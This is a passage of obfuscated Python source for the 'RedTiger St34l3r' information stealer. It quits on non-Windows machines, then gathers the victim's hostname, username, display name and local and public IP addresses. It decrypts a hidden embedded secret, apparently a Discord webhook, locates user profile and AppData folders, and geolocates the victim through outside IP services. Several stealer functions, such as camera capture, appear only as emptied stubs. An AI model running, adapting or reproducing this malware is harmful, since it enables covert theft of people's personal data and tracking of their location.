
import sys

def WYSSEYWOJDGSVMPPEYEZBQZDLVTJMDOTAQDUEFZSHTFXISVRIHCXATIKDZBOXMVUAOBVHBZILDCWIJELWROQYYBYCIBCBYWWH():
    def NSZRYPDMVDUEXQNPWXXXOEYENOXTTIHRCZQIWSBYFTKVOHIYQLNFNYWNBLKFNHDJWYATLOLJTMFGDMJKUPVSUEDBKR():
        if sys.platform.startswith("win"):
            return False
        else:
            return True
    
    try: 
        HGTOVINYBUULICAJTLTJSPQNQVDRVESMWRESXZQFDINBAIOFSIYXMMMLXSFLPCNMZRWNOSUHM = NSZRYPDMVDUEXQNPWXXXOEYENOXTTIHRCZQIWSBYFTKVOHIYQLNFNYWNBLKFNHDJWYATLOLJTMFGDMJKUPVSUEDBKR()
        if HGTOVINYBUULICAJTLTJSPQNQVDRVESMWRESXZQFDINBAIOFSIYXMMMLXSFLPCNMZRWNOSUHM == True:
            return HGTOVINYBUULICAJTLTJSPQNQVDRVESMWRESXZQFDINBAIOFSIYXMMMLXSFLPCNMZRWNOSUHM
    except:
        return True
    
if WYSSEYWOJDGSVMPPEYEZBQZDLVTJMDOTAQDUEFZSHTFXISVRIHCXATIKDZBOXMVUAOBVHBZILDCWIJELWROQYYBYCIBCBYWWH() == True:
    sys.exit()
    
import os
import socket
import win32api
import requests
import base64
import ctypes
import threading
import discord
import zipfile
import io
from json import loads
from urllib.request import urlopen
from cryptography.hazmat.primitives import hashes
from cryptography.hazmat.primitives.kdf.pbkdf2 import PBKDF2HMAC
from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes
from cryptography.hazmat.primitives import padding
from cryptography.hazmat.backends import default_backend

def MBJHIYVNSVHBSLWQSUJADQJBLCNJGCTSDKGBIIOARQCSYCJGUZBSBPNTOFBT(DYADTYIHJLYQQTQVBPKHSBNTNYETLMWAWEYZNKAQRQRQVVMHPRFYWUHNTLAUFZQWCXXEWCOIDFTFZQHLQNKD): 
    HGTOVINYBUULICAJTLTJSPQNQVDRVESMWRESXZQFDINBAIOFSIYXMMMLXSFLPCNMZRWNOSUHM_system_info = None
    return HGTOVINYBUULICAJTLTJSPQNQVDRVESMWRESXZQFDINBAIOFSIYXMMMLXSFLPCNMZRWNOSUHM_system_info

def CIYLZERZWXKWLAMPSAVTLWAYHQJSQCIXFEJNQKJYSWIYPDUZZHZTNWXTSESXLELTGAPLJMSJWTFJ(DYADTYIHJLYQQTQVBPKHSBNTNYETLMWAWEYZNKAQRQRQVVMHPRFYWUHNTLAUFZQWCXXEWCOIDFTFZQHLQNKD):
    ZSIRONJCJZMWMECOQKEMDGZRMTQPLRRIWGINIUGEEBOGIALUSQGVPKGSKHCVTL = None
    return ZSIRONJCJZMWMECOQKEMDGZRMTQPLRRIWGINIUGEEBOGIALUSQGVPKGSKHCVTL

def HUETVNGSPQYJJRBBSIDQZCWMBFGBAGNQGOZBKSTIAPEXCTWNXKMMHSJHWFLDBTWQTWJWOLWKYCVGHJLUZPFBNJPJAS(DYADTYIHJLYQQTQVBPKHSBNTNYETLMWAWEYZNKAQRQRQVVMHPRFYWUHNTLAUFZQWCXXEWCOIDFTFZQHLQNKD):
    SNDPREXNQZSQQMUHEFZUGRUEJEMMVFRMIOEBYDLKXSQTNYDORLWFERRIRCIDY = None
    return SNDPREXNQZSQQMUHEFZUGRUEJEMMVFRMIOEBYDLKXSQTNYDORLWFERRIRCIDY

def ZYMMMWLKRWFVJABPLXPYAYIJOLYYRGCCSPCOQZJXKOJKDYZDACQYVPKDEGKOPNPBQGSQWSAZWGLNBVEGUYVEQTCLSNHOWCVGKZEE(): 
    HAOVZJMOWXECWQFFMPQLPSEXOJVJVKEIZMUWHNKPBKZSVJDWUSHRZVWJYXITPIZBPIATE = None
    return HAOVZJMOWXECWQFFMPQLPSEXOJVJVKEIZMUWHNKPBKZSVJDWUSHRZVWJYXITPIZBPIATE

def TQNPAUYJLYMXDXYDVVSYVHLDUKJOIJQOUBMHAXCGJSWBATUYJJDWYDPIIAZJVBIKEUMUXUNNSIUTGUHIPAUKQJJMMYSTRDDZHEM(DYADTYIHJLYQQTQVBPKHSBNTNYETLMWAWEYZNKAQRQRQVVMHPRFYWUHNTLAUFZQWCXXEWCOIDFTFZQHLQNKD): 
    YHJNIVWXKWYIIBYVHJTZRRUNWBBOEVVCXUGDBHNQDKXDIVEMKPMMMUH = None
    RPFYVOWIVYIEBFBYLBQQUFLPRCGFRSIKAEAMGGSYUAASFJOMBOWRKYYMBQDHHVHPFNVIX = None
    HVNCSTIRHDVFALETMTKYDVXEFUKSABPTWBGLZGWCKTBHPRAGSGRVFDMYSPDKZSRGHJQXNIMCXPS = None
    HFGUVHTXCHAEOCHEOKWQGCUIPNYAHIIUCOAEPSNTBYIQYIELAJSKRPAWFSJUZXFFARQSLYKB = None
    YZINSDQVFUIYGQMYNKTYBTXHYLTOZHVJHEKDJLHHJQYFHNVGGWRZSCMCMKJAQVUPWNVQLNWJQAVWLPDJGREHRTZUEQBSFY = None
    ATJQNUCVALRAUPTRJFHBAFEZRWEKEWBXNCHRGWSXLVXFVWZVJBXVAIPLJRXFVXYEVDGQTZYEQXSFDHPJFRO = None
    return YHJNIVWXKWYIIBYVHJTZRRUNWBBOEVVCXUGDBHNQDKXDIVEMKPMMMUH, RPFYVOWIVYIEBFBYLBQQUFLPRCGFRSIKAEAMGGSYUAASFJOMBOWRKYYMBQDHHVHPFNVIX, HVNCSTIRHDVFALETMTKYDVXEFUKSABPTWBGLZGWCKTBHPRAGSGRVFDMYSPDKZSRGHJQXNIMCXPS, HFGUVHTXCHAEOCHEOKWQGCUIPNYAHIIUCOAEPSNTBYIQYIELAJSKRPAWFSJUZXFFARQSLYKB, YZINSDQVFUIYGQMYNKTYBTXHYLTOZHVJHEKDJLHHJQYFHNVGGWRZSCMCMKJAQVUPWNVQLNWJQAVWLPDJGREHRTZUEQBSFY, ATJQNUCVALRAUPTRJFHBAFEZRWEKEWBXNCHRGWSXLVXFVWZVJBXVAIPLJRXFVXYEVDGQTZYEQXSFDHPJFRO

def WYZPBLULYBFWVXHMJWGSOJIEQMJOCKGNJEEJUEIBPODMAFAQQGSDFUJCEIYSHJXOWRXXLOLPITKDAKIYQZCESQ(DYADTYIHJLYQQTQVBPKHSBNTNYETLMWAWEYZNKAQRQRQVVMHPRFYWUHNTLAUFZQWCXXEWCOIDFTFZQHLQNKD):
    JWQIPBSQNSXPODJVPBTIPTCBRQBISNGHTVQWMDQHZIDPUIYIEEROLCEGIPMJKILTNUOWJPGKO = None
    MVBKTNZVQVAKTMBBZPARZRYRWGQYTIVIBCWJAEQOJOLQYNHEFUBLPODWPKKQJAGGCIPHPIGGL = None
    JGGPLRKFCXJOMHMSNGPAOBVSDXTXRUDMONUQFDWIVVVDHTJDSMEVNZKPIJKQLDNKJDLEXOSHCEGIEMLTXUKQTSPVKHCOZHXDH = None
    return JWQIPBSQNSXPODJVPBTIPTCBRQBISNGHTVQWMDQHZIDPUIYIEEROLCEGIPMJKILTNUOWJPGKO, MVBKTNZVQVAKTMBBZPARZRYRWGQYTIVIBCWJAEQOJOLQYNHEFUBLPODWPKKQJAGGCIPHPIGGL, JGGPLRKFCXJOMHMSNGPAOBVSDXTXRUDMONUQFDWIVVVDHTJDSMEVNZKPIJKQLDNKJDLEXOSHCEGIEMLTXUKQTSPVKHCOZHXDH

def TTAQRGYSNDFXMJYEROTKHANLIJUKRJBHZTCHZJQCYXRXDENOMKNLWFYTFUGFESICGWYZGJBAJHDJP(DYADTYIHJLYQQTQVBPKHSBNTNYETLMWAWEYZNKAQRQRQVVMHPRFYWUHNTLAUFZQWCXXEWCOIDFTFZQHLQNKD):
    GDNDHWHIYORQHGJXLBYUMNSXZJOWCBRZSMPSBMMXQWGIHUSKSNEZBRRIVIPIVOSIFQQNVFSMDJSPHYYA = None
    return GDNDHWHIYORQHGJXLBYUMNSXZJOWCBRZSMPSBMMXQWGIHUSKSNEZBRRIVIPIVOSIFQQNVFSMDJSPHYYA

def HYVNLFBPZZJSLIJSYUBEWIKHYUASUXBARDFKSWCFJBCIXQRBMO(DYADTYIHJLYQQTQVBPKHSBNTNYETLMWAWEYZNKAQRQRQVVMHPRFYWUHNTLAUFZQWCXXEWCOIDFTFZQHLQNKD):
    HGTOVINYBUULICAJTLTJSPQNQVDRVESMWRESXZQFDINBAIOFSIYXMMMLXSFLPCNMZRWNOSUHM_camera_capture = None
    return HGTOVINYBUULICAJTLTJSPQNQVDRVESMWRESXZQFDINBAIOFSIYXMMMLXSFLPCNMZRWNOSUHM_camera_capture

def FGVXUEYARKIMXGDLVVGHGPFSOVPZZFEVTXHDPHDVWKGHDSQIAGMTC(DYADTYIHJLYQQTQVBPKHSBNTNYETLMWAWEYZNKAQRQRQVVMHPRFYWUHNTLAUFZQWCXXEWCOIDFTFZQHLQNKD): 
    MTBHFINCXXJTYGKDHPZTJXKITAMLECEGKXJVDUTEOOSXUJZLFJEQNCIUQYKSWVHDTHCPYGMJLWIJLYW = None
    return MTBHFINCXXJTYGKDHPZTJXKITAMLECEGKXJVDUTEOOSXUJZLFJEQNCIUQYKSWVHDTHCPYGMJLWIJLYW

def XUPQSFIUQYKBELCTIRPJFUCHMEAJDUMVVOFQMLFHDIUAOVBBTWYTLTQMOXLXIQXGFQTXSYPBWXTTFOKS(): pass
def VMYZBIYPVCXWJWMTEDICAZWXOHUFHKERFIDNOMFRTWYLOPRUFQVZOUKHSBJBTLWURXRKAQQKJDNINIIWAK(): pass
def AZUWCOIFFRVCJXUDCUOZFAYZIRJBSWRPZHGSYOFJEAVKINXMSGXICMQBLKVAOCIUGUHRMBTIFXGOUXARAIFQHFUQWNMBECTQ(): pass
def WQNIDONMQALRMAQFZGWDLTHVUXUYBKFQDWUEQRYQRVUGABTZYMFRLCHOXQQGMHVUQRQOWFWIDD(): pass
def FNQKJUKCCOAECIDNWZSITGFJIWUEYBXOJNGPNHRUNILRBFYGEWPJLPKHIVANGZH(): pass
def NDQZRLPVPHVLROJIITHADPPTQMRJJTBZMGYAIYTSVIEXGNQOIINTNGDYFXAHVHGKVOGHOKGWZOYAFDUTNHB(): pass
def FXWCREEAAPXANHZTUGCAGKZRLVCHMBIKRBUMDCSHHEUHCBPONLVGETVDYBXLPEQIWCTTGCAXKHDPUPYQQZ(): pass
def XOFIGIYZUOFZXBKPMTALYLVXYTYJHLPXGXYFLAVGNDJIEICLENITEBLHMGPDXNIVWJVMCNOONDSWEZBPUYCGCBBMP(): pass
def OONVBSPUZVSEWWGKPVTCULJJDKXAGCYFWGWLEUIKTPFKEPBHHZAUFDREDSPNAYLULEXOIUQKASUDSSVEEVY(): pass
def DCQJAIYZQXFVFTYYORRJJFGHGKDZQQOEPOWYBJHGDDEVTFFEPDJJSEYBSKGRLUWXVJWODOZDLEJAGSZMIZOKLCPJBKSSAXRX(): pass
def XIMSHQKDOVFQCMVRNETWVRUJQESOKLAACCIMSQWTPQHTHOYSNKXZVYRZOGSQPMDTTEGAQWOCSBCBZPVKVNQJZNZT(): pass
def FLRPPLFLQBYJKGUDOIYESUPXLAKCIQLMHHRENMKVAQHLCRLMRCZJJDVWVWLFLEXG(): pass

def WLZWYLXANBNOUPANFFXRULZNNVTIODAJBVROTICRGYKFQUZZPDSQHSNDNYYCLXJKEUCRTTKDHTTAJJLJHIHALLVHBFPIFXLY(title):
    try:
        if sys.platform.startswith("win"):
            ctypes.windll.kernel32.SetConsoleTitleW(title)
        elif sys.platform.startswith("linux"):
            sys.stdout.write(f"\x1b]2;{title}\x07")
    except:
        pass
        
def XUJNGIQDRMZKGNYNFZODZFJCPSWSSJJYLAYHFGSDLSGFOKEFUHMZQXDHJRESYN():
    try:
        if sys.platform.startswith("win"):
            os.system("cls")
        elif sys.platform.startswith("linux"):
            os.system("clear")
    except:
        pass

def MBSNERXDCKYYXOBULWTPIXYBBXCXYSVSPRGGSGQEZQLOLVKOQHOFVPDZVSLCVBVDUKNQOUNTTEFTBTHKXRO(FGTBGVDDAXOUKLXCTCDCCHZNHEUSRLBQCSSOOFTKXWNZVJMLVFDQXKMKVBTQLJEPNHLBEZPDVHCWEF, GEOXNJUYRSNBSZKLHFMIDUFMDXCUNUJVISNFWIMEBFNEUUWOWIRKOAULGVYHBGTYRQBDTVGUGYNZKELBHZJGCGQSPWQZCOZVO):
    def PDQDVHEMMELHDPYGRJBEPNVHQGDTIBDUKRUFEPVMOMCRLJUCNUXXVIPVZLSGKBFFOZLUOAQDKNHTCCSXLBVDADVXALHNAAVHGAXZ(NAZSGGPHOEARDFRICAKQXOPMCOZJRQDTYNRJIJWDRILKCRTHXGHFFWYGDQYJMIDQYMSFBJPOXWJFHWVNVQVACFMIWT, SDDUBRNMQORXRUENCISTVKGLVAIPHKVXZCISMBTMKIARGBVRZSVJTKTDYSHPTGXOHOICYD):
        ZFDYYPVJFEGGWOGSPSDKIYGFSKJAHQVNOKLGDDJHMUUMYSMVRY = PBKDF2HMAC(algorithm=hashes.SHA256(), length=32, salt=SDDUBRNMQORXRUENCISTVKGLVAIPHKVXZCISMBTMKIARGBVRZSVJTKTDYSHPTGXOHOICYD, iterations=100000, backend=default_backend())
        if isinstance(NAZSGGPHOEARDFRICAKQXOPMCOZJRQDTYNRJIJWDRILKCRTHXGHFFWYGDQYJMIDQYMSFBJPOXWJFHWVNVQVACFMIWT, str):  
            NAZSGGPHOEARDFRICAKQXOPMCOZJRQDTYNRJIJWDRILKCRTHXGHFFWYGDQYJMIDQYMSFBJPOXWJFHWVNVQVACFMIWT = NAZSGGPHOEARDFRICAKQXOPMCOZJRQDTYNRJIJWDRILKCRTHXGHFFWYGDQYJMIDQYMSFBJPOXWJFHWVNVQVACFMIWT.encode()  
        return ZFDYYPVJFEGGWOGSPSDKIYGFSKJAHQVNOKLGDDJHMUUMYSMVRY.derive(NAZSGGPHOEARDFRICAKQXOPMCOZJRQDTYNRJIJWDRILKCRTHXGHFFWYGDQYJMIDQYMSFBJPOXWJFHWVNVQVACFMIWT)

    FGTBGVDDAXOUKLXCTCDCCHZNHEUSRLBQCSSOOFTKXWNZVJMLVFDQXKMKVBTQLJEPNHLBEZPDVHCWEF_data = base64.b64decode(FGTBGVDDAXOUKLXCTCDCCHZNHEUSRLBQCSSOOFTKXWNZVJMLVFDQXKMKVBTQLJEPNHLBEZPDVHCWEF)
    SDDUBRNMQORXRUENCISTVKGLVAIPHKVXZCISMBTMKIARGBVRZSVJTKTDYSHPTGXOHOICYD = FGTBGVDDAXOUKLXCTCDCCHZNHEUSRLBQCSSOOFTKXWNZVJMLVFDQXKMKVBTQLJEPNHLBEZPDVHCWEF_data[:16]
    PCYDBIBYCVPYXHIKVMQUYAXEKFMZRHSEOQSIIIKDVKNAFWDYKDAGRHSQWJFUHISEHGONKJGXFLNVRSYFDSNSPBGQCAQWSJ = FGTBGVDDAXOUKLXCTCDCCHZNHEUSRLBQCSSOOFTKXWNZVJMLVFDQXKMKVBTQLJEPNHLBEZPDVHCWEF_data[16:32]
    FGTBGVDDAXOUKLXCTCDCCHZNHEUSRLBQCSSOOFTKXWNZVJMLVFDQXKMKVBTQLJEPNHLBEZPDVHCWEF_data = FGTBGVDDAXOUKLXCTCDCCHZNHEUSRLBQCSSOOFTKXWNZVJMLVFDQXKMKVBTQLJEPNHLBEZPDVHCWEF_data[32:]
    APLJCBIZXJJGOFGBYPJTPZDQHRAULBSUSPXRBNEQSNMKDWXMKDGABHHFFUUYUYPZAFTXESNFBYXNWPLRIVOACVPBKS = PDQDVHEMMELHDPYGRJBEPNVHQGDTIBDUKRUFEPVMOMCRLJUCNUXXVIPVZLSGKBFFOZLUOAQDKNHTCCSXLBVDADVXALHNAAVHGAXZ(GEOXNJUYRSNBSZKLHFMIDUFMDXCUNUJVISNFWIMEBFNEUUWOWIRKOAULGVYHBGTYRQBDTVGUGYNZKELBHZJGCGQSPWQZCOZVO, SDDUBRNMQORXRUENCISTVKGLVAIPHKVXZCISMBTMKIARGBVRZSVJTKTDYSHPTGXOHOICYD)
    SOZNDKKQHTRJHCSCFHHQGDVBIZUZMOQSBSMIUUCVOMYSNVKLXACCHHKCKZHQRNETUFFOZO = Cipher(algorithms.AES(APLJCBIZXJJGOFGBYPJTPZDQHRAULBSUSPXRBNEQSNMKDWXMKDGABHHFFUUYUYPZAFTXESNFBYXNWPLRIVOACVPBKS), modes.CBC(PCYDBIBYCVPYXHIKVMQUYAXEKFMZRHSEOQSIIIKDVKNAFWDYKDAGRHSQWJFUHISEHGONKJGXFLNVRSYFDSNSPBGQCAQWSJ), backend=default_backend())
    KVHXNOMBYRNQHJDZZLGQCPCCHKPXUCTLNBJWNYHIXXNNGCWRSLJJIELBUGTCIVUNHOD = SOZNDKKQHTRJHCSCFHHQGDVBIZUZMOQSBSMIUUCVOMYSNVKLXACCHHKCKZHQRNETUFFOZO.decryptor()
    MITNUCOUZJTFCANDTBBPDNMIPGWJSLPJOUZTBZMNNPAVCPQBGMNULPSKVTSU = KVHXNOMBYRNQHJDZZLGQCPCCHKPXUCTLNBJWNYHIXXNNGCWRSLJJIELBUGTCIVUNHOD.update(FGTBGVDDAXOUKLXCTCDCCHZNHEUSRLBQCSSOOFTKXWNZVJMLVFDQXKMKVBTQLJEPNHLBEZPDVHCWEF_data) + KVHXNOMBYRNQHJDZZLGQCPCCHKPXUCTLNBJWNYHIXXNNGCWRSLJJIELBUGTCIVUNHOD.finalize()
    RBAQQZVWXNMUKDNUIVLFHGDGRBOGDJEIFQYHNXFQHEQRNVPCSWXOOGJPMYANDRYQRRNVUTWEBUWITEIZFUOGBGZYFSVYX = padding.PKCS7(128).unpadder()
    ROPWINFHOGRXHFQHFGWGGPSYJWRGRABDWHJMHOCLMKGIHTJFPNWLEHMZJNJZSMMXNROSJYDMCXLV = RBAQQZVWXNMUKDNUIVLFHGDGRBOGDJEIFQYHNXFQHEQRNVPCSWXOOGJPMYANDRYQRRNVUTWEBUWITEIZFUOGBGZYFSVYX.update(MITNUCOUZJTFCANDTBBPDNMIPGWJSLPJOUZTBZMNNPAVCPQBGMNULPSKVTSU) + RBAQQZVWXNMUKDNUIVLFHGDGRBOGDJEIFQYHNXFQHEQRNVPCSWXOOGJPMYANDRYQRRNVUTWEBUWITEIZFUOGBGZYFSVYX.finalize()
    return ROPWINFHOGRXHFQHFGWGGPSYJWRGRABDWHJMHOCLMKGIHTJFPNWLEHMZJNJZSMMXNROSJYDMCXLV.decode()

WLZWYLXANBNOUPANFFXRULZNNVTIODAJBVROTICRGYKFQUZZPDSQHSNDNYYCLXJKEUCRTTKDHTTAJJLJHIHALLVHBFPIFXLY("")

try: DNCRQGYAVNZCFUVDLLUUPMEAVXXJPOYKWZRKXTGKGPURFPZFKBNESGGIWJPGAIWKRSTTRZOQGKLPBZNQYIVGVI    = socket.gethostname()
except: DNCRQGYAVNZCFUVDLLUUPMEAVXXJPOYKWZRKXTGKGPURFPZFKBNESGGIWJPGAIWKRSTTRZOQGKLPBZNQYIVGVI = "None"

try: ULNYRBBLQSGHOGDXOQUHIGLAXMGBBKFUWQYVVZXYEAQKQBXLRUCERYEWRIIHIHZXGFYLGJGCZBXMAWVKZF    = os.getlogin()
except: ULNYRBBLQSGHOGDXOQUHIGLAXMGBBKFUWQYVVZXYEAQKQBXLRUCERYEWRIIHIHZXGFYLGJGCZBXMAWVKZF = "None"

try: LTQUKIQQANBEFIGMVVRURAZUZDMHOSQTURWBDGVRVJIVTSDZAFFHRMPVKDOTVTQCOEUWQWECH    = win32api.GetUserNameEx(win32api.NameDisplay)
except: LTQUKIQQANBEFIGMVVRURAZUZDMHOSQTURWBDGVRVJIVTSDZAFFHRMPVKDOTVTQCOEUWQWECH = "None"

try: ZAGNRWRFUHPYZVRJGARXWJCOHJTGBBUFCWHSKBFEGSUIVYGZDWU    = requests.get("https://api.ipify.org?format=json").json().get("ip", "None")
except: ZAGNRWRFUHPYZVRJGARXWJCOHJTGBBUFCWHSKBFEGSUIVYGZDWU = "None"

try: SXSGNHILKSGMLFWLPQZCZMUJQJACCNLXJVPDIJPACMAKERJPAPMBKHNKLB    = socket.gethostbyname(socket.gethostname())
except: SXSGNHILKSGMLFWLPQZCZMUJQJACCNLXJVPDIJPACMAKERJPAPMBKHNKLB = "None"

HJHRAMHCYRAGLLPDITAJHEMSTLQRLKPKQWEQERQDUMKCEUEBEDWDEGXATWEJNUHIRKTUKCFHPZRQPNDEUZEZDDBZP = r"""
yD+sZIvX56LgWOwHyZzPVdNrdMFLQdZ1W6zulG4QEq6B+c/5FDdBsw7V76in4zuOrXeXHCAZok3W78yw3FjhnmTY0TiWtWc8NpFvCUucowszf+UsRR9FRxWHHnWDn/v02cwnSw8OL0RfwnIFAZJ8OZ5uAo93DKiUwdHm/nZ5xWErQ79kwtmMFVeZYzr8lpBRvuw4NLPf9ZLc5uGtO/Z91Q==
"""

HWDLWAPPJPSEYQCOXXASLIGAGTKXSNTWUPYAVNJZYZEMHNLVEXF            = "xkqwoGquFQAuHWndKbnPZlqOLbnVeyUFttMJpEqrcstguPTDaHFObHrotzzyDkwMbNCiKRBVxPsfnVcjYxQQwnSaqpFuVdUiOnHdkH"
GOFIMXLBMBWLFKKVBPDPEQFVBFGKOTUXHJWUILRBZHTCUGNSJK        = "None"
OIXHTAUFJGUVCWCAWPVGEKOZSSDEWIQLHAPGNQTEMJBKBOTSOTYCIAILHIKFIWACN    = 0xa80505
WXZIPDFEWMSTKLZYUXAIHLCBLECHWFCMCYRXYICXCCHHLJFRJZPRRLCNKECBCOVFJFFM = "RedTiger St34l3r"
SRHEAGZRWTHFGBKQCZCETYILHAEYKEPVMVQKEQIKKZOTMZOJDEY   = "https://google.com"
RPORGOBBIGEBMBIITQLQBTIYYBCMXVRSOBCOIGGGJYBRPZGPSIFJMFHIVSPDAHOVMIWCUHJZIKIUNNTQYMY    = "RedTiger St34l3r - github.com/loxy0dev/RedTiger-Tools"
BRKPYPOSYDDFMNCXJPTXFCPHIFLVYTKMKYELLCBLNSLAXFOEZBMNXLPTWNQZUDRIALIBLR   = {"text": RPORGOBBIGEBMBIITQLQBTIYYBCMXVRSOBCOIGGGJYBRPZGPSIFJMFHIVSPDAHOVMIWCUHJZIKIUNNTQYMY, "icon_url": SRHEAGZRWTHFGBKQCZCETYILHAEYKEPVMVQKEQIKKZOTMZOJDEY}
JRMDTWOTUXXCSWGYXEJFINIVKREMHDMBISNGAMAYLVGTSYJHMBFUXMGMYOHEXWRXIYLWIKISAGZZIAKTGAPBRBNQXHKVVYDIWKTK    = f'`{ULNYRBBLQSGHOGDXOQUHIGLAXMGBBKFUWQYVVZXYEAQKQBXLRUCERYEWRIIHIHZXGFYLGJGCZBXMAWVKZF} "{ZAGNRWRFUHPYZVRJGARXWJCOHJTGBBUFCWHSKBFEGSUIVYGZDWU}"`'
WUCIVKPIRRPVMERPUMTJFBJVXPEUEHDAIBOIDVVEXCBFZTTOCXUYVIDRZFZCMBBA    = MBSNERXDCKYYXOBULWTPIXYBBXCXYSVSPRGGSGQEZQLOLVKOQHOFVPDZVSLCVBVDUKNQOUNTTEFTBTHKXRO(HJHRAMHCYRAGLLPDITAJHEMSTLQRLKPKQWEQERQDUMKCEUEBEDWDEGXATWEJNUHIRKTUKCFHPZRQPNDEUZEZDDBZP, HWDLWAPPJPSEYQCOXXASLIGAGTKXSNTWUPYAVNJZYZEMHNLVEXF)

YDWUFYAFSFYPFGOGIWYAWKHEOBYAPANADFRAVFGJDSWRMTKZAVCJPNJTRRSIYMZJGQSI           = os.getenv("WINDIR", None)
AKCGRNWHZNQDLQNBNEZERAWBREWWEYTWWFQWZIOWQYFZFBZAOTPIPQDQCSVGSNWKRHHFVXCDBZKRBYXXMYCOYTXMDBECYQOZNSSH       = os.getenv('USERPROFILE', None)
HLMUKKOTOKZMAXOUWMUHTYWGJQJZRTIUDWJLNHIQLJOLKMDAPTVJFGTTKDNBNUTQCIVKEOTFHMWLDDLNDBVARLNZIRUIOIBVYT     = os.getenv('LOCALAPPDATA', None)
WWROWZLKOSKGBMGTZJUPZLBMLUGFAZXJLFGUFQJBPRAMPSVVUSTWQYIUQXR   = os.getenv('APPDATA', None)
USPAHHQVOFBANUYLMYXSCKFOWLVORRNBRCPNECEIXJSHXBFZGGWUXIJWDZYWUSN = os.getenv('ProgramFiles(x86)', None)
if USPAHHQVOFBANUYLMYXSCKFOWLVORRNBRCPNECEIXJSHXBFZGGWUXIJWDZYWUSN is None:
    USPAHHQVOFBANUYLMYXSCKFOWLVORRNBRCPNECEIXJSHXBFZGGWUXIJWDZYWUSN = os.getenv('ProgramFiles', None)

try:
    TGVEBHDSNXQSYVTZALYTPFIFKNOFGRNKVADCUSWDSQVOCTZEFREARMFZGBBJTIKBVEPXROXZDHJCKMNWDLPRSRG = requests.get(f"https://{GOFIMXLBMBWLFKKVBPDPEQFVBFGKOTUXHJWUILRBZHTCUGNSJK}/api/ip/ip={ZAGNRWRFUHPYZVRJGARXWJCOHJTGBBUFCWHSKBFEGSUIVYGZDWU}")
    AAEEIVVVVWGBAANQLEAMTDBIICCSIJKDJIZRJMQCMULQUEFCWU = TGVEBHDSNXQSYVTZALYTPFIFKNOFGRNKVADCUSWDSQVOCTZEFREARMFZGBBJTIKBVEPXROXZDHJCKMNWDLPRSRG.json()

    AYXXHMZGQTZCWWKHEZDNJEFIVTDXVEYKHPNKDNKMMUTDUMHMDAZVAOGUKIPBP = AAEEIVVVVWGBAANQLEAMTDBIICCSIJKDJIZRJMQCMULQUEFCWU.get('country', "None")
    AYXXHMZGQTZCWWKHEZDNJEFIVTDXVEYKHPNKDNKMMUTDUMHMDAZVAOGUKIPBP_code = AAEEIVVVVWGBAANQLEAMTDBIICCSIJKDJIZRJMQCMULQUEFCWU.get('country_code', "None")
    BIOPQNGXESHWUWWHSYAYNRDADXDLVXRYSCALVTANPYOWUQZDKECRBGZJLYTBQPXWSHJQJBHQHYGIAJFXCPOCPDHAWMPCMQMA = AAEEIVVVVWGBAANQLEAMTDBIICCSIJKDJIZRJMQCMULQUEFCWU.get('region', "None")
    BIOPQNGXESHWUWWHSYAYNRDADXDLVXRYSCALVTANPYOWUQZDKECRBGZJLYTBQPXWSHJQJBHQHYGIAJFXCPOCPDHAWMPCMQMA_code = AAEEIVVVVWGBAANQLEAMTDBIICCSIJKDJIZRJMQCMULQUEFCWU.get('region_code', "None")
    HKXMQFCIPWIDFCHWUJEYPXOSZVAIMSQVVKRIQFYTWLECYAQNHDGSWTMCSOMJIQKETTSYBAEGSSISNO = AAEEIVVVVWGBAANQLEAMTDBIICCSIJKDJIZRJMQCMULQUEFCWU.get('zip', "None")
    JQJVPDOJTABDXTYBEDNAREXXOHLBOMSHWOOARSMYKYQIKPZPOPWADGRQYZDSEAQO = AAEEIVVVVWGBAANQLEAMTDBIICCSIJKDJIZRJMQCMULQUEFCWU.get('city', "None")
    BBAXEZMIBWHPQJRAWLNFFWHXYNTMQWNOKLBLHUKNABATHBPYUVRENQJKLREMDACJVQMYDPTVQEAFNQBNITPQYIFMTEGPDNUM = AAEEIVVVVWGBAANQLEAMTDBIICCSIJKDJIZRJMQCMULQUEFCWU.get('latitude', "None")
    PIVQNKBWRJRSOJYXYOBSKGSMYVUVACKCQIYKXZOFDIGUNYUPUBDYIIWMSRBSNONFDKJZMNKGPYIQBZINLHDEUIQLIF = AAEEIVVVVWGBAANQLEAMTDBIICCSIJKDJIZRJMQCMULQUEFCWU.get('longitude', "None")
    NPHOKWOKNTYHRODFXEJTCVFSGJJNHMNQAXBQLTRHOKOOQKWVNBQLUUISHPQXNYMWROPXXQHVZ = AAEEIVVVVWGBAANQLEAMTDBIICCSIJKDJIZRJMQCMULQUEFCWU.get('timezone', "None")
    BARXMIWZMEDCUMXOZBLLHFNOYOEYAKUZODWUDFYFKKZHZLYZBYJPLVSPFWOZCULPMTIW = AAEEIVVVVWGBAANQLEAMTDBIICCSIJKDJIZRJMQCMULQUEFCWU.get('isp', "None")
    GHBYTDJSHUIYVKLFTHCXXFMISNDSPMLWUKVTXJZTCMLSFBSKNKPTZFCUB = AAEEIVVVVWGBAANQLEAMTDBIICCSIJKDJIZRJMQCMULQUEFCWU.get('org', "None")
    YFXOROAEOKGPAMYEIGDRRWXQDTJUVJWXBROBLONGMJLVLNDWVSGAVNQRXQCSZBZFMCXKXUHLNMOJTEEEXWFRBGFVLM = AAEEIVVVVWGBAANQLEAMTDBIICCSIJKDJIZRJMQCMULQUEFCWU.get('as', "None")
except:
    TGVEBHDSNXQSYVTZALYTPFIFKNOFGRNKVADCUSWDSQVOCTZEFREARMFZGBBJTIKBVEPXROXZDHJCKMNWDLPRSRG = requests.get(f"http://ip-api.com/json/{ZAGNRWRFUHPYZVRJGARXWJCOHJTGBBUFCWHSKBFEGSUIVYGZDWU}")
    AAEEIVVVVWGBAANQLEAMTDBIICCSIJKDJIZRJMQCMULQUEFCWU = TGVEBHDSNXQSYVTZALYTPFIFKNOFGRNKVADCUSWDSQVOCTZEFREARMFZGBBJTIKBVEPXROXZDHJCKMNWDLPRSRG.json()

    AYXXHMZGQTZCWWKHEZDNJEFIVTDXVEYKHPNKDNKMMUTDUMHMDAZVAOGUKIPBP = AAEEIVVVVWGBAANQLEAMTDBIICCSIJKDJIZRJMQCMULQUEFCWU.get('country', "None")
    AYXXHMZGQTZCWWKHEZDNJEFIVTDXVEYKHPNKDNKMMUTDUMHMDAZVAOGUKIPBP_code = AAEEIVVVVWGBAANQLEAMTDBIICCSIJKDJIZRJMQCMULQUEFCWU.get('countryCode', "None")
